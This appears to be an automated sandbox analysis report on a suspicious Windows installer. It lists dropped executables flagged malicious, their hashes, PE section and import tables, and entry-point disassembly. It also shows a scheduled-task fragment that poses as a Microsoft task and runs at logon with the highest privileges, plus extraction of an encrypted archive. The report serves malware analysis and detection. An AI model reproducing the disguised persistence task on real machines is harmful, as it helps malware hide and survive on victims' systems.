                                        SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                                        MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                                        SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                                        SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                                        SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 9%
                                        Process:C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):4096
                                        Entropy (8bit):3.3482223822620667
                                        Encrypted:false
                                        SSDEEP:48:dXKLzDln/L6w0QldOVQOj933ODOiTdKbKsz72eW+5y4:dXazDlnewhldOVQOj6dKbKsz7
                                        MD5:1E1D0466AB0FE8F2802587D337A10567
                                        SHA1:362B3B6EFBE51EBD0702167061812CA567BB11BD
                                        SHA-256:8B761FF2FDDF15A5E1AB4758D2112550B9A857F3B77F6A8EDC5F33586AEA06EC
                                        SHA-512:4F37DAE32D421BB88B4C2B079461BE28F47343E84A1546519CC8107C2A842C16D14D736504457E4586BFB92E68B01D905BC3B45C4F68FA1FF6E87B41A9996809
                                        Malicious:false
                                        Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwo
                                        Process:C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                                        File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                        Category:dropped
                                        Size (bytes):5649408
                                        Entropy (8bit):6.392614480390128
                                        Encrypted:false
                                        SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                                        MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                                        SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                                        SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                                        SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):1.1940658735648508
                                        Encrypted:false
                                        SSDEEP:3:NlllulxmH/lZ:NllUg
                                        MD5:D904BDD752B6F23D81E93ECA3BD8E0F3
                                        SHA1:026D8B0D0F79861746760B0431AD46BAD2A01676
                                        SHA-256:B393D3CEC8368794972E4ADD978B455A2F5BD37E3A116264DBED14DC8C67D6F2
                                        SHA-512:5B862B7F0BCCEF48E6A5A270C3F6271D7A5002465EAF347C6A266365F1B2CD3D88144C043D826D3456AA43484124D619BF16F9AEAB1F706463F553EE24CB5740
                                        Malicious:false
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):3366912
                                        Entropy (8bit):6.530548291878271
                                        Encrypted:false
                                        SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                        MD5:9902FA6D39184B87AED7D94A037912D8
                                        SHA1:F5D8470ACF5DFF81C6D3364A8943B24E3DB48D95
                                        SHA-256:43D9F1FA3BDA81C618CC23FBB4E9D8551305AF0090A3D452C4070F938F6BCFAC
                                        SHA-512:BC97E2C379C464F821AF0E38630DB65165F4E91A1105A3C7DABCC5E61CC9EAAB1522AC82E749AA4FEFC5A9E21A295A0A59CFE99D6BC3980F9C89F00AF5B8CF75
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                        Process:C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):6144
                                        Entropy (8bit):4.720366600008286
                                        Encrypted:false
                                        SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                        MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                        SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                        SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                        SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                        Malicious:false
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):3598848
                                        Entropy (8bit):7.004949099807939
                                        Encrypted:false
                                        SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                                        MD5:1D1464C73252978A58AC925ECE57F0FB
                                        SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                                        SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                                        SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 11%
                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):3366912
                                        Entropy (8bit):6.530548291878271
                                        Encrypted:false
                                        SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                        MD5:9902FA6D39184B87AED7D94A037912D8
                                        SHA1:F5D8470ACF5DFF81C6D3364A8943B24E3DB48D95
                                        SHA-256:43D9F1FA3BDA81C618CC23FBB4E9D8551305AF0090A3D452C4070F938F6BCFAC
                                        SHA-512:BC97E2C379C464F821AF0E38630DB65165F4E91A1105A3C7DABCC5E61CC9EAAB1522AC82E749AA4FEFC5A9E21A295A0A59CFE99D6BC3980F9C89F00AF5B8CF75
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                        Process:C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):6144
                                        Entropy (8bit):4.720366600008286
                                        Encrypted:false
                                        SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                        MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                        SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                        SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                        SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                        Malicious:false
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):3598848
                                        Entropy (8bit):7.004949099807939
                                        Encrypted:false
                                        SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                                        MD5:1D1464C73252978A58AC925ECE57F0FB
                                        SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                                        SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                                        SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 11%
                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                        File Type:ASCII text, with CRLF, CR line terminators
                                        Category:dropped
                                        Size (bytes):406
                                        Entropy (8bit):5.117520345541057
                                        Encrypted:false
                                        SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                                        MD5:9200058492BCA8F9D88B4877F842C148
                                        SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                                        SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                                        SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                                        Malicious:false
                                        Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..
                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):7.921265219134115
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 98.04%
                                        • Inno Setup installer (109748/4) 1.08%
                                        • InstallShield setup (43055/19) 0.42%
                                        • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                        File name:#U5b89#U88c5#U52a9#U624b1.0.2.exe
                                        File size:5'707'508 bytes
                                        MD5:8d24ff51c87bc901cb4c88cb885dc15a
                                        SHA1:c8f7e17799b8ad0769f83b2d7d8f491384aa93d0
                                        SHA256:52ae54a6103be491559249ed1ed982b69b06948849a880db142eb37ff0484a3b
                                        SHA512:dbee19d7f7716dbcd5b4c63c90c63526c6f183038e84cb303c2f46587a7be1d164d186e799cb42280981ab1a917575aac982dc0eaab186dea329cc85bf43543e
                                        SSDEEP:98304:XwRES3ZFYl6Qc9lJkMtCI4ZZEoqW2cb/k913pDdMwZgf:lUo6jbtF4Z12cbchs
                                        TLSH:D5461223F2CBE53DE05E0B3B15B2A15894FB6A216522AD52C6ECB4ECCF351601D3E647
                                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                        Icon Hash:0c0c2d33ceec80aa
                                        Entrypoint:0x4a83bc
                                        Entrypoint Section:.itext
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:6
                                        OS Version Minor:1
                                        File Version Major:6
                                        File Version Minor:1
                                        Subsystem Version Major:6
                                        Subsystem Version Minor:1
                                        Import Hash:40ab50289f7ef5fae60801f88d4541fc
                                        Instruction
                                        push ebp
                                        mov ebp, esp
                                        add esp, FFFFFFA4h
                                        push ebx
                                        push esi
                                        push edi
                                        xor eax, eax
                                        mov dword ptr [ebp-3Ch], eax
                                        mov dword ptr [ebp-40h], eax
                                        mov dword ptr [ebp-5Ch], eax
                                        mov dword ptr [ebp-30h], eax
                                        mov dword ptr [ebp-38h], eax
                                        mov dword ptr [ebp-34h], eax
                                        mov dword ptr [ebp-2Ch], eax
                                        mov dword ptr [ebp-28h], eax
                                        mov dword ptr [ebp-14h], eax
                                        mov eax, 004A2EBCh
                                        call 00007F3980734835h
                                        xor eax, eax
                                        push ebp
                                        push 004A8AC1h
                                        push dword ptr fs:[eax]
                                        mov dword ptr fs:[eax], esp
                                        xor edx, edx
                                        push ebp
                                        push 004A8A7Bh
                                        push dword ptr fs:[edx]
                                        mov dword ptr fs:[edx], esp
                                        mov eax, dword ptr [004B0634h]
                                        call 00007F39807C61BBh
                                        call 00007F39807C5D0Eh
                                        lea edx, dword ptr [ebp-14h]
                                        xor eax, eax
                                        call 00007F39807C09E8h
                                        mov edx, dword ptr [ebp-14h]
                                        mov eax, 004B41F4h
                                        call 00007F398072E8E3h
                                        push 00000002h
                                        push 00000000h
                                        push 00000001h
                                        mov ecx, dword ptr [004B41F4h]
                                        mov dl, 01h
                                        mov eax, dword ptr [0049CD14h]
                                        call 00007F39807C1D13h
                                        mov dword ptr [004B41F8h], eax
                                        xor edx, edx
                                        push ebp
                                        push 004A8A27h
                                        push dword ptr fs:[edx]
                                        mov dword ptr fs:[edx], esp
                                        call 00007F39807C6243h
                                        mov dword ptr [004B4200h], eax
                                        mov eax, dword ptr [004B4200h]
                                        cmp dword ptr [eax+0Ch], 01h
                                        jne 00007F39807CCF2Ah
                                        mov eax, dword ptr [004B4200h]
                                        mov edx, 00000028h
                                        call 00007F39807C2608h
                                        mov edx, dword ptr [004B4200h]
                                        Name                                  Virtual Address  Virtual Size  Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT          0xb7000          0x71          .edata
                                        IMAGE_DIRECTORY_ENTRY_IMPORT          0xb5000          0xfec         .idata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE        0xcb000          0x11000       .rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC       0xba000          0x10fa8       .reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_TLS             0xb9000          0x18          .rdata
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_IAT             0xb52d4          0x25c         .idata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0xb6000          0x1a4         .didata
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                        Name     Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy             Characteristics
                                        .text    0x1000           0xa568c       0xa5800   b889d302f6fc48a904de33d8d947ae80  False     0.3620185045317221   data       6.377190161826806   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .itext   0xa7000          0x1b64        0x1c00    588dd0a8ab499300d3701cbd11b017d9  False     0.548828125          data       6.109264411030635   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .data    0xa9000          0x3838        0x3a00    5c0c76e77aef52ebc6702430837ccb6e  False     0.35338092672413796  data       4.95916338709992    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .bss     0xad000          0x7258        0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                    empty      0.0                 IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .idata   0xb5000          0xfec         0x1000    627340dff539ef99048969aa4824fb2d  False     0.380615234375       data       5.020404933181373   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .didata  0xb6000          0x1a4         0x200     fd11c1109737963cc6cb7258063abfd6  False     0.34765625           data       2.729290535217263   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .edata   0xb7000          0x71          0x200     7de8ca0c7a61668a728fd3a88dc0942d  False     0.1796875            data       1.305578535725827   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .tls     0xb8000          0x18          0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                    empty      0.0                 IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rdata   0xb9000          0x5d          0x200     d84006640084dc9f74a07c2ff9c7d656  False     0.189453125          data       1.3892750148744617  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc   0xba000          0x10fa8       0x11000   a85fda2741bd9417695daa5fc5a9d7a5  False     0.5789579503676471   data       6.709466460182023   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                        .rsrc    0xcb000          0x11000       0x11000   c77c993913ee57d416c0b87d169b66eb  False     0.18785903033088236  data       3.721257000596691   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        Name           RVA      Size    Type                                                                                    Language  Country        ZLIB Complexity
                                        RT_ICON        0xcb678  0xa68   Device independent bitmap graphic, 64 x 128 x 4, image size 2048                        English   United States  0.1174924924924925
                                        RT_ICON        0xcc0e0  0x668   Device independent bitmap graphic, 48 x 96 x 4, image size 1152                         English   United States  0.15792682926829268
                                        RT_ICON        0xcc748  0x2e8   Device independent bitmap graphic, 32 x 64 x 4, image size 512                          English   United States  0.23387096774193547
                                        RT_ICON        0xcca30  0x128   Device independent bitmap graphic, 16 x 32 x 4, image size 128                          English   United States  0.39864864864864863
                                        RT_ICON        0xccb58  0x1628  Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colors  English   United States  0.08339210155148095
                                        RT_ICON        0xce180  0xea8   Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors   English   United States  0.1023454157782516
                                        RT_ICON        0xcf028  0x8a8   Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors   English   United States  0.10649819494584838
                                        RT_ICON        0xcf8d0  0x568   Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors    English   United States  0.10838150289017341
                                        RT_ICON        0xcfe38  0x12e5  PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced                             English   United States  0.8712011577424024
                                        RT_ICON        0xd1120  0x4228  Device independent bitmap graphic, 64 x 128 x 32, image size 16896                      English   United States  0.05668398677373642
                                        RT_ICON        0xd5348  0x25a8  Device independent bitmap graphic, 48 x 96 x 32, image size 9600                        English   United States  0.08475103734439834
                                        RT_ICON        0xd78f0  0x10a8  Device independent bitmap graphic, 32 x 64 x 32, image size 4224                        English   United States  0.09920262664165103
                                        RT_ICON        0xd8998  0x468   Device independent bitmap graphic, 16 x 32 x 32, image size 1088                        English   United States  0.2047872340425532
                                        RT_STRING      0xd8e00  0x3f8   data                                                                                                             0.3198818897637795
                                        RT_STRING      0xd91f8  0x2dc   data                                                                                                             0.36475409836065575
                                        RT_STRING      0xd94d4  0x430   data                                                                                                             0.40578358208955223
                                        RT_STRING      0xd9904  0x44c   data                                                                                                             0.38636363636363635
                                        RT_STRING      0xd9d50  0x2d4   data                                                                                                             0.39226519337016574
                                        RT_STRING      0xda024  0xb8    data                                                                                                             0.6467391304347826
                                        RT_STRING      0xda0dc  0x9c    data                                                                                                             0.6410256410256411
                                        RT_STRING      0xda178  0x374   data                                                                                                             0.4230769230769231
                                        RT_STRING      0xda4ec  0x398   data                                                                                                             0.3358695652173913
                                        RT_STRING      0xda884  0x368   data                                                                                                             0.3795871559633027
                                        RT_STRING      0xdabec  0x2a4   data                                                                                                             0.4275147928994083
                                        RT_RCDATA      0xdae90  0x10    data                                                                                                             1.5
                                        RT_RCDATA      0xdaea0  0x310   data                                                                                                             0.6173469387755102
                                        RT_RCDATA      0xdb1b0  0x2c    data                                                                                                             1.1818181818181819
                                        RT_GROUP_ICON  0xdb1dc  0xbc    data                                                                                    English   United States  0.6170212765957447
                                        RT_VERSION     0xdb298  0x584   data                                                                                    English   United States  0.2804532577903683
                                        RT_MANIFEST    0xdb81c  0x7a8   XML 1.0 document, ASCII text, with CRLF line terminators                                English   United States  0.3377551020408163
                                        DLL | Import
                                        kernel32.dll | GetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                                        comctl32.dll | InitCommonControls
                                        user32.dll | CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                                        oleaut32.dll | SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                                        advapi32.dll | ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
                                        Name | Ordinal | Address
                                        __dbk_fcall_wrapper | 2 | 0x40fc10
                                        dbkFCallWrapperAddr | 1 | 0x4b063c
                                        Language of compilation system | Country where language is spoken
                                        English | United States
                                        No network behavior found

                                        Target ID:0
                                        Start time:03:24:08
                                        Start date:23/12/2024
                                        Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe"
                                        Imagebase:0xde0000
                                        File size:5'707'508 bytes
                                        MD5 hash:8D24FF51C87BC901CB4C88CB885DC15A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:Borland Delphi
                                        Reputation:low
                                        Has exited:true

                                        Target ID:2
                                        Start time:03:24:09
                                        Start date:23/12/2024
                                        Path:C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                                        Wow64 process (32bit):true
